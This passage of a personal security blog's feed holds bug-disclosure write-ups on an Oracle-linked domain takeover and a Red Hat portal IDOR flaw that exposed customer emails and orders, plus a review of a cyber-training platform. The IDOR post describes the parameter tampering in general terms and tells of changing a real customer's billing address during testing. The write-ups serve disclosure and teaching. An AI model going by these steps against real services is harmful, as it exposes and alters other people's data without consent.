srcset="https://flaviu.io/content/images/size/w600/2021/01/dosomethingreat.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/01/dosomethingreat.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/01/dosomethingreat.jpg 1600w, https://flaviu.io/content/images/2021/01/dosomethingreat.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>&quot;Surround yourself with positive people.&quot;</figcaption></figure><hr><!--kg-card-begin: markdown--><p>Have you got any suggestions or questions for me ? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article, Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[I come in peace!]]></title><description><![CDATA[This is the type of issue would benefit someone with malicious intent and little know-how, this was concerning to me because the banking company currently processes 130 billion in payments annually for its clients, which include banks, card entities, and payment.]]></description><link>https://flaviu.io/oracle-vulnerability-disclosure/</link><guid isPermaLink="false">5f972e8b1679673a38c4b745</guid><category><![CDATA[cybersecurity]]></category><category><![CDATA[hacking]]></category><category><![CDATA[linux]]></category><category><![CDATA[offensivesecurity]]></category><category><![CDATA[bugbounty]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Mon, 25 Jan 2021 11:17:36 GMT</pubDate><media:content url="https://flaviu.io/content/images/2021/01/Oracle-Logox.png" medium="image"/><content:encoded><![CDATA[<img src="https://flaviu.io/content/images/2021/01/Oracle-Logox.png" alt="I come in peace!"><p>I hope everyone is safe and well! I have not been active on the blog recently. It&apos;s time for an update of what I&apos;ve been doing.</p><p>Today I am writing a short article on my disclosure to Oracle.</p><hr><p>Casual day, browsing the internet, looking for my next victim (joke!) a page that belonged to Oracle had an error that caught my attention. I decided to have a look into it, this was mainly because of the domain name where the error occurred, it was a bank that provides financial infrastructure to deliver a range of B2B banking solutions and services, enabling businesses to trade globally.</p><p>They are using digitally disruptive technology that frees it from the legacy systems that make those traditional banks slow and expensive.</p><p>After doing some white magic (DNS level) and taking over the bank&apos;s domain which would also result in taking over Oracle&apos;s domain, essentially owning 2 high authority domains in one go.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/01/magic.png" class="kg-image" alt="I come in peace!" loading="lazy" width="997" height="834" srcset="https://flaviu.io/content/images/size/w600/2021/01/magic.png 600w, https://flaviu.io/content/images/2021/01/magic.png 997w" sizes="(min-width: 720px) 720px"><figcaption>wizzard, spells book</figcaption></figure><p>This is the type of issue would benefit someone with malicious intent and little know-how, this was concerning to me because the banking company currently processes 130 billion in payments annually for its clients, which include banks, card entities, and payment gateways that choose. It also has partnerships with several other banks to provide direct clearing access, making the payments faster and cheaper.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/01/darkwizzard.jpg" class="kg-image" alt="I come in peace!" loading="lazy" width="800" height="551" srcset="https://flaviu.io/content/images/size/w600/2021/01/darkwizzard.jpg 600w, https://flaviu.io/content/images/2021/01/darkwizzard.jpg 800w" sizes="(min-width: 720px) 720px"><figcaption>Dark Wizzard</figcaption></figure><p>Because I found this through Oracle, it was time to send them an e-mail and point out my concern. Oracle security team were prompt and fixed the issue that relied on their end and informed the 3rd party as well.</p><p>A few weeks go by and I receive an e-mail to say that I will be given credit in the upcoming Critical Patch Update, due to be released at 1:00 PM, U.S. Pacific Time, on January 19, 2021.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/01/image-4.png" class="kg-image" alt="I come in peace!" loading="lazy" width="1895" height="805" srcset="https://flaviu.io/content/images/size/w600/2021/01/image-4.png 600w, https://flaviu.io/content/images/size/w1000/2021/01/image-4.png 1000w, https://flaviu.io/content/images/size/w1600/2021/01/image-4.png 1600w, https://flaviu.io/content/images/2021/01/image-4.png 1895w" sizes="(min-width: 720px) 720px"><figcaption>Oracle Online Presence Security Contributor</figcaption></figure><figure class="kg-card kg-bookmark-card kg-card-hascaption"><a class="kg-bookmark-container" href="https://www.oracle.com/security-alerts/cpujan2021.html"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Oracle Critical Patch Update Advisory - January 2021</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://www.oracle.com/asset/web/favicons/favicon-192.png" alt="I come in peace!"><span class="kg-bookmark-author">January 2021</span></div></div></a><figcaption>Oracle Critical Patch Update January 2021</figcaption></figure><hr><p>Since ~2 months, it looks like I&apos;ve been absent from my blog and my usual hobbies Hack The Box, CTFs and so on. I had to get my priorities first, my University assessments, which were quite odd, due to this year&apos;s being digitally delivered.</p><p>Unfortunately, there is only so many hours in a day and my time is already so limited, as my kids are growing they require more and more of my attention.</p><p>Despite all this, I have been doing lots of cool stuff and I have many stories like this one to talk about! At the moment Hack The Box is on pause, CTFs are on pause and looking for bugs is on pause as well, This is because I&apos;ve committed to a <strong>bigger project! Stay tuned</strong> to find out more.</p><!--kg-card-begin: markdown--><p>Have you got any suggestions or questions for me ? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article, Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Don't ask me to do a darn thing, I'm RED HATTING]]></title><description><![CDATA[Sometimes in life we hear facts, facts that shock us. These facts can be along the lines of "Did you know all the plastic ever manufactured is still on the planet?" Shocking isn't it. Another fact that seems to shock even the most tech savvy, is that...]]></description><link>https://flaviu.io/red-hat-vulnerability-disclosure/</link><guid isPermaLink="false">5fb566671679673a38c4bad0</guid><category><![CDATA[cybersecurity]]></category><category><![CDATA[hacking]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Mon, 23 Nov 2020 18:39:40 GMT</pubDate><media:content url="https://flaviu.io/content/images/2020/11/screenfetch-rhel-8-2.png" medium="image"/><content:encoded><![CDATA[<hr><img src="https://flaviu.io/content/images/2020/11/screenfetch-rhel-8-2.png" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING"><p>Sometimes in life, we hear facts, facts that shock us. These facts can be along the lines of &quot;Did you know all the plastic ever manufactured is still on the planet?&quot; Shocking isn&apos;t it. Another fact that seems to shock even the most tech-savvy, is that there are on average 84,500 attempted cyber-attacks per day on small businesses within the UK (<a href="https://www.hiscoxgroup.com/news/press-releases/2018/18-10-18">Hiscox</a>, <a href="https://www.hiscox.co.uk/business-insurance/cyber-and-data-insurance/faq/small-business-guide-to-cyber-attacks">Hiscox</a>), The average mean cost of a cyber security breach for a small business in 2019 was &#xA3;11,000 (<a href="https://www.gov.uk/government/statistics/cyber-security-breaches-survey-2019">Official Gov.uk Cyber Security Breaches Survey 2019</a>).</p><p>Now that is shocking. However, most breaches are minor and do not cause much damage or inconvenience but what happens when the breach is not so small and could cause the company lots of damage? What if these breaches reveal personal information about consumers and their orders?</p><p>Let&apos;s look at a couple examples</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-4.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="714" height="402" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-4.png 600w, https://flaviu.io/content/images/2020/11/image-4.png 714w"><figcaption>TOP 5 BIGGEST GDPR FINES</figcaption></figure><p>A couple more to jog your memory, remember the infamous Cambridge Analytica scandal? this compromised the data of 87 million users.</p><p>How about a recent settlement, The Information Commissioner&#x2019;s Office has <a href="https://ico.org.uk/action-weve-taken/enforcement/ticketmaster-uk-limited/">fined Ticketmaster UK Limited &#xA3;1.25million for failing to keep its customers&#x2019; personal data secure</a>.</p><p>Ok, enough with the stats!</p><hr><p> An imminent breach was discovered by me and this is how it happened.</p><p><em>Before we move on please see /</em><a href="https://flaviu.io/disclaimer/"><em>disclaimer</em></a><em>/</em></p><p>It all started on a sunny day shortly after I received the e-mail pictured below, I assumed this was due to have just enrolled <a href="https://www.redhat.com/en/services/training/red-hat-academy">RedHat Academy</a> as a requirement for one of my modules at <a href="https://www.gcu.ac.uk/">University</a>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-3.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="1177" height="805" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-3.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-3.png 1000w, https://flaviu.io/content/images/2020/11/image-3.png 1177w" sizes="(min-width: 720px) 720px"><figcaption>RedHat Email</figcaption></figure><p>As we can see nothing bad in here, thanks for being chosen for this RedHat!<br></p><p>Opening the underlined hyperlink takes me to a training portal, it does it&apos;s authentication through their SSO (Single Sign-On).<br>&#x200C;</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/11/image-9-1.png" width="1910" height="934" loading="lazy" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-9-1.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-9-1.png 1000w, https://flaviu.io/content/images/size/w1600/2020/11/image-9-1.png 1600w, https://flaviu.io/content/images/2020/11/image-9-1.png 1910w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/11/image-10-1.png" width="1095" height="576" loading="lazy" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-10-1.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-10-1.png 1000w, https://flaviu.io/content/images/2020/11/image-10-1.png 1095w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>RedHat SSO portal</figcaption></figure><p>I log in with my RedHat account and browse about the website, the portal can be seen below.</p><p>Nothing out the ordinary here, I was purely just looking to see what&apos;s in it for me.<br></p><p>I head to my profile and find a section where it showed me the e-mail I had just received.</p><p>This is what caught my attention. This is just a coincidence o_O</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/redhat1.gif" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="869" height="600"><figcaption>RedHat Email</figcaption></figure><p>You know what I&apos;m thinking right? Allowed to see the source code, resend button.. hmm! Bug Hunter mode ON! But wait wait wait, Do they have a policy?</p><ul><li>I had no vulnerability found at this stage but I needed to know that I am allowed to proceed.</li></ul><p>Turns out RedHat does have a Vulnerability Disclosure Program, but not a Bug bounty program [..] a quick google searched and found a link on <a href="https://hackerone.com/redhat?type=team">HackerOne</a>.</p><p>At this stage, it was apparent to me that if I decided to go ahead and try to find something I was not going to get any monetary rewards. I&apos;m cool with that as I previously mentioned in my other articles, I&apos;m in for the learning experience and if I can add any value, why not.</p><p>Coming back to the source code of the e-mail, by allowing anyone to see this, makes it so much easier to grab the HTML code and use it for spear phishing attacks, Then I wondered, what is the purpose of this resend button?</p><p>Time to summon the interceptor God, I&apos;m talking about <a href="https://portswigger.net/burp">Burp Suite</a>! Big congrats to <a href="https://portswigger.net/">Portswigger</a> Team for building such a fantastic application security testing software.</p><p>So at this stage, I just want to see what the requests look like, what parameters there are when I interact with the portal, what happens when I click resend etc.</p><p>My initial attack vector was just simply to see if I can edit the source code, place my own website as the hyperlink and resend it to myself. If I could do that successfully then I build from there onwards.</p><p>I spent some time trying to achieve this but I couldn&apos;t, I tried to blame it on my inexperience however based on what I could see within the requests I started to realize that the template of the e-mail is loaded from within the app and I cannot modify these templates or add my own.</p><p>Ok dammit.. nothing yet.. Time to enumerate more!</p><p>A couple interesting parameters I noticed were sessionId=&quot;abc1234&quot; and emaId=&quot;1234&quot; (examples)</p><p>So what really happens if I capture a request when I ask the application to show me the contents of my email (with my own emailId) but then I change that value to see if I can access other email&apos;s correspondence.</p><p>Yep, we&apos;re talking about an IDOR (Insecure direct object references).</p><h3 id="what-is-an-idor-vulnerability"><strong>What is an IDOR vulnerability?</strong></h3><p>There can be many variables in the application such as &quot;id&quot;, &quot;pid&quot;, &quot;uid&quot; etc. Although these values are often seen as HTTP parameters, they can be found in headers and cookies. The attacker can access, edit or delete any of other users&#x2019; objects by changing the values. This vulnerability is called IDOR.</p><p>First, it needs to understand the application flow developed by software developers. All the modules functions and their sub-modules functions need to be understood when the logged-in user into the web/mobile application. It is also important to remember that this vulnerability is as severe as XSS, CSRF in security testing and as a type of vulnerability that is not easily discovered (automatized testing or manual testing).</p><p>The IDOR vulnerability is illustrated in the following image between user and server.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-13.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="1600" height="995" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-13.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-13.png 1000w, https://flaviu.io/content/images/2020/11/image-13.png 1600w" sizes="(min-width: 720px) 720px"><figcaption>IDOR vulnerability</figcaption></figure><hr><p>Okay, changed the values, sent the request... I get this:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-14.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="874" height="577" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-14.png 600w, https://flaviu.io/content/images/2020/11/image-14.png 874w" sizes="(min-width: 720px) 720px"><figcaption>RedHat Email</figcaption></figure><p>Wow.. so now I see this customers email and can download their attachments, checking the source code of that email reveals no private information about this customer besides their full name.<br>Each customer had an inbox so every time I would pick a different emailId, I&apos;d get a different inbox, so I played around with this for a while, trying to increase severity of this bug, the contents were all similar, some were revealing significantly more information (payment related).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-15.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="1088" height="608" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-15.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-15.png 1000w, https://flaviu.io/content/images/2020/11/image-15.png 1088w" sizes="(min-width: 720px) 720px"><figcaption>Email Content RedHat</figcaption></figure><p>Moving on, what else is possible to access besides these emails.</p><p><br>I noticed the tab &quot;My Orders&quot; so I clicked there.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-16.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="1124" height="533" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-16.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-16.png 1000w, https://flaviu.io/content/images/2020/11/image-16.png 1124w" sizes="(min-width: 720px) 720px"><figcaption>My Orders RedHat</figcaption></figure><p>Of course, I didn&apos;t have any orders, so trying to search for product names like &quot;red hat certification&quot; or some unknown order number revealed no entries found.</p><p><br>I decided to capture a blank request on the Search button to see what parameters are there.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-17.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="1345" height="51" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-17.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-17.png 1000w, https://flaviu.io/content/images/2020/11/image-17.png 1345w" sizes="(min-width: 720px) 720px"><figcaption>Request RedHat Burp</figcaption></figure><p>So we can see in_param2=&quot; &quot;, playing with this value, with my first try I managed to find a result.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-18.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="1127" height="528" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-18.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-18.png 1000w, https://flaviu.io/content/images/2020/11/image-18.png 1127w" sizes="(min-width: 720px) 720px"><figcaption>Order RedHat</figcaption></figure><p>Perfect! Now capturing the next request will give me a better idea of how this request looks when opening the order tab.</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/11/2020-11-23-13_10_54-Clipboard.png" width="1102" height="600" loading="lazy" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" srcset="https://flaviu.io/content/images/size/w600/2020/11/2020-11-23-13_10_54-Clipboard.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/2020-11-23-13_10_54-Clipboard.png 1000w, https://flaviu.io/content/images/2020/11/2020-11-23-13_10_54-Clipboard.png 1102w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/11/2020-11-23-13_13_30-Clipboard1.png" width="1107" height="453" loading="lazy" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" srcset="https://flaviu.io/content/images/size/w600/2020/11/2020-11-23-13_13_30-Clipboard1.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/2020-11-23-13_13_30-Clipboard1.png 1000w, https://flaviu.io/content/images/2020/11/2020-11-23-13_13_30-Clipboard1.png 1107w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Order RedHat</figcaption></figure><p>Ok as you can see this allows me to see this particular customer whose order I found playing with the in_param2 value. I can Print Order, View Transaction Details, Cancel/Refund Order, Change billing address, View Full Details.</p><p><br>I decided straight from the beginning I will not try the Cancel/Refund order function but I did try &quot;changing the billing address&quot;.</p><p><br>As seen below, I was able to add a new billing address and set it as default. I noticed I wasn&apos;t able to remove this address so I left notes for RedHat if they wanted to fix it themselves (I have restored the default billing address).</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/11/2020-11-23-13_26_53-Clipboard3-1.png" width="1110" height="596" loading="lazy" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" srcset="https://flaviu.io/content/images/size/w600/2020/11/2020-11-23-13_26_53-Clipboard3-1.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/2020-11-23-13_26_53-Clipboard3-1.png 1000w, https://flaviu.io/content/images/2020/11/2020-11-23-13_26_53-Clipboard3-1.png 1110w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/11/2020-11-23-13_28_16-Clipboard4.png" width="1124" height="587" loading="lazy" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" srcset="https://flaviu.io/content/images/size/w600/2020/11/2020-11-23-13_28_16-Clipboard4.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/2020-11-23-13_28_16-Clipboard4.png 1000w, https://flaviu.io/content/images/2020/11/2020-11-23-13_28_16-Clipboard4.png 1124w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/11/2020-11-23-13_28_16-Clipboard5.png" width="1448" height="599" loading="lazy" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" srcset="https://flaviu.io/content/images/size/w600/2020/11/2020-11-23-13_28_16-Clipboard5.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/2020-11-23-13_28_16-Clipboard5.png 1000w, https://flaviu.io/content/images/2020/11/2020-11-23-13_28_16-Clipboard5.png 1448w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>From Left to Right (Changing billing address) RedHat</figcaption></figure><hr><p>I tried to find other customer&apos;s orders without changing any details to their billing and as expected, I was able to find more customers. The purpose of this was to show RedHat that I can see more than just one customer&apos;s details.</p><p><br>I stopped there, one can assume that if this function worked then I could cancel/refund the order as well.</p><p><br>I got in touch with RedHat Security Team, sent them a detailed report with a step by step procedure to reproduce all the above, and I recorded those in a Proof of Concept video just to make it easier for them to identify exactly where and how I found these issues.</p><p><br>[sending null payloads...]</p><p><br>I know my article has many screenshots and a few are obfuscated for obvious reasons. I would love to add the proof of concept video but I agreed with RedHat not to disclose personally identifiable information about their customer base.</p><p><br>Timeline:</p><figure class="kg-card kg-code-card"><pre><code class="language-ascii">Congratulations Email [Received] We 07/10/2020 08:17am
Vulnerability Disclosure Report [Sent] Mon 12/10/2020 15:22pm
Acknowledgement of the Report [Received] 15/10/2020 09:06am
Needs more info from RedHat [Received] Mon 19/10/2020 14:07pm
More info [Sent] 19/10/2020 14:16pm
PoC validated by RedHat [Received] 20/10/2020 16:15pm
Issues remediated [Received] 16/11/2020 22:56pm
Added to Hall of Fame [Received] 17/11/2020 09:26am</code></pre><figcaption>Timeline</figcaption></figure><hr><figure class="kg-card kg-bookmark-card kg-card-hascaption"><a class="kg-bookmark-container" href="https://access.redhat.com/articles/66234"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Vulnerability Acknowledgements for Red Hat online services - Red Hat Customer Portal</div><div class="kg-bookmark-description">Vulnerability Acknowledgements for Red Hat online services.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://access.redhat.com/webassets/avalon/g/favicon.ico" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING"><span class="kg-bookmark-author">Red Hat Customer Portal</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://access.redhat.com/webassets/avalon/g/shadowman-200.png" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING"></div></a><figcaption>Hall Of Fame RedHat</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-20.png" class="kg-image" alt="Don&apos;t ask me to do a darn thing, I&apos;m RED HATTING" loading="lazy" width="1633" height="856" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-20.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-20.png 1000w, https://flaviu.io/content/images/size/w1600/2020/11/image-20.png 1600w, https://flaviu.io/content/images/2020/11/image-20.png 1633w" sizes="(min-width: 720px) 720px"><figcaption>Hall Of Fame RedHat</figcaption></figure><!--kg-card-begin: markdown--><p>Have you got any suggestions or questions for me ? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article, Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Immersive Labs #1]]></title><description><![CDATA[This blog is about Immersive Labs, and how it's helping me establish a good cyber security foundation and beyond.]]></description><link>https://flaviu.io/immersive-labs/</link><guid isPermaLink="false">5f972e7f1679673a38c4b741</guid><category><![CDATA[learning]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Wed, 04 Nov 2020 21:40:05 GMT</pubDate><media:content url="https://flaviu.io/content/images/2020/11/IL.jpg" medium="image"/><content:encoded><![CDATA[<figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/immersivelabs-1.png" class="kg-image" alt="Immersive Labs #1" loading="lazy" width="999" height="333" srcset="https://flaviu.io/content/images/size/w600/2020/10/immersivelabs-1.png 600w, https://flaviu.io/content/images/2020/10/immersivelabs-1.png 999w" sizes="(min-width: 720px) 720px"><figcaption><strong>the world&#x2019;s first fully interactive, gamified and on-demand cyber skills platform.</strong></figcaption></figure><img src="https://flaviu.io/content/images/2020/11/IL.jpg" alt="Immersive Labs #1"><p>This blog is about <a href="https://immersivelabs.online/">Immersive Labs</a>, and how it&apos;s helping me establish a good cyber security foundation and beyond.</p><p><em>I hope you will find this information useful</em>.</p><hr><blockquote>This is not a sponsored article.</blockquote><p></p><p>Immersive Labs is changing the way companies address their cyber skills challenges.<br></p><p>It is founded by former GCHQ cybersecurity instructor James Hadley, the platform combines learning methods used by hackers with real time threat intelligence to help your security team keep pace with attackers. They do this by creating story-driven virtual games in the browser, called labs.</p><p>A couple differences between IL and other platforms are:</p><p>Other platforms, e.g <a href="https://hackthebox.eu">HackTheBox</a> or <a href="https://tryhackme.com/">TryHackMe</a> might require you to have Linux on your host or a virtual machine installed and to connect to their VPN, for IL all you need is within your browser.</p><p>In each lab you get will get an information tab with a quick summary about that specific subject and a few resources to help you complete the lab. This is something you don&apos;t find in HackTheBox, however TryHackMe do have labs with a few &apos;hints&apos; along the way.</p><p><br>Each lab allow the users to learn from real life scenarios ranging from cyber awareness to headline-hitting malware and everything in between.</p><p><br>These labs even include emerging threads and vulnerabilities the same day they&apos;re discovered.<br>Immersive Labs challenge users to find their own solutions, encouraging creative thinking and ultimately long term skills development and talent retention.<br></p><p>They offer options where you can even keep track of your team&apos;s progress as they complete labs, they use this information to benchmark the organization&apos;s cyber capabilities against industry frameworks, including MITRE ATT&amp;CK, meaning they always know where our strengths - and most importantly, our weaknesses - lie.</p><hr><p>Immersive Labs is free for students, it&apos;s name is &quot;<a href="https://dca.immersivelabs.online/signin">Students&#x2019; Digital Cyber Academy</a>&#x2122;<strong>&quot;, </strong>IL have mentioned that the labs on the platform are as used by <a href="https://www.goldmansachs.com/">Goldman Sachs</a>, <a href="https://www2.deloitte.com/global/en.html">Deloitte </a>and <a href="https://www.baesystems.com/en/home">BAE Systems</a> use to train their staff.</p><p>A couple of my lecturers had mentioned this platform when I started my studies at University and ultimately this is how I joined. All you need to register is your student email and you will have access to hundreds of labs and more created every day.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/lights.jpg" class="kg-image" alt="Immersive Labs #1" loading="lazy" width="1920" height="1157" srcset="https://flaviu.io/content/images/size/w600/2020/10/lights.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/10/lights.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/10/lights.jpg 1600w, https://flaviu.io/content/images/2020/10/lights.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Juegos del Parque Rod&#xF3;</figcaption></figure><p>They are building content and simulations that challenge users at any level to rapidly and constantly upskill, anyone can start from scratch, gathering the basics through a series of labs to build a strong foundation of cyber security knowledge.</p><p>Users will be using a variety of operating systems and security tools as well as learning how to analyze log files and code.</p><p>For example, gamified scenarios let users see the impact of their decisions in real time and better understand outcomes.</p><p><br>Story-based threat simulations empower users to enhance while stopping an online breach or hacking industrial control systems, including contained access to operating systems , tools and malicious code.</p><p>I believe that this is a good way to continuously develop cyber skills,<br>every part of your work force needs some level of cyber skills, Traditional teaching e.g classroom and online training might not offer enough visibility of how effective these courses are and can become quickly out of date. Also training isn&apos;t always directly relevant to the real risks we face.</p><h3 id="competition">Competition</h3><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/competition.jpg" class="kg-image" alt="Immersive Labs #1" loading="lazy" width="1920" height="1221" srcset="https://flaviu.io/content/images/size/w600/2020/10/competition.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/10/competition.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/10/competition.jpg 1600w, https://flaviu.io/content/images/2020/10/competition.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Tough Competition</figcaption></figure><p>Immersive Labs have 3 types of ranking on their Leaderboard system.</p><ul><li>My Organization</li><li>Global Ranking</li><li>League Table</li></ul><p>My Organization is formed of people who are part of the same domain, so what I mean by that, I enrolled under <em>my student e-mail</em> so therefore IL knows I belong to Caledonian University, the ranking is you vs all the users from the same domain.</p><p>Global Ranking is yourself vs everyone that is registered on Immersive Labs.</p><p>League Table is your Organization or for example in my case, my University vs all the other universities that are registered.</p><p>Another good point to mention is that Immersive Labs have structured the content you receive based on the persona you pick.</p><p>They currently have 5 different types of personas:</p><!--kg-card-begin: markdown--><p>Non-Technical - You don&apos;t work in cyber security, but you&apos;ve seen stories in the news about recent attacks and would like to understand more about staying secure.</p>
<p>Executive - You are a senior executive or board member. You want to understand cyber security topics and risk decisions in more detail.</p>
<p>Engineer - You work with computers and networks on a daily basis. You want to understand how to improve security when building and deploying new infrastructure.</p>
<p>Developer - You are responsible for developing and maintaining applications in your environment. You would like to acquire and demonstrate knowledge and skills to keep those applications secure.</p>
<p>Cyber-Professional - You currently work (or aspire to work) in a cyber security role and like to keep up with the latest threats. You enjoy learning about risk and solving technical problems in both a defensive and offensive environment.</p>
<!--kg-card-end: markdown--><p>You can can switch between persona&apos;s and solve different labs. The points you receive are unique to each persona and will not be added in total.</p><hr><h3 id="what-is-the-outcome">What is the outcome?</h3><p></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/outcome.jpg" class="kg-image" alt="Immersive Labs #1" loading="lazy" width="1024" height="768" srcset="https://flaviu.io/content/images/size/w600/2020/10/outcome.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/10/outcome.jpg 1000w, https://flaviu.io/content/images/2020/10/outcome.jpg 1024w" sizes="(min-width: 720px) 720px"><figcaption>success</figcaption></figure><p>You become the driving force behind patching the security posture. </p><p>You can learn the skills you need to help your organization stay secure, better understand cybersecurity threats, like detecting and understanding phishing and malware reverse-engineering.</p><h3 id="my-current-stats-">My current stats: </h3><!--kg-card-begin: markdown--><p>My main persona: Cyber Security Professional</p>
<p>Completed 233 labs</p>
<p>Completed Objectives:</p>
<ol>
<li>Become a Junior Penetration Tester</li>
<li>Become a Tier 1 SOC Analyst</li>
<li>Essential Cyber Security for Remote Workers 4 &#x2013; Attacks &amp; Vulnerabilities</li>
<li>Essential Cyber Security for Remote Workers 2 &#x2013; Cyber Security Awareness</li>
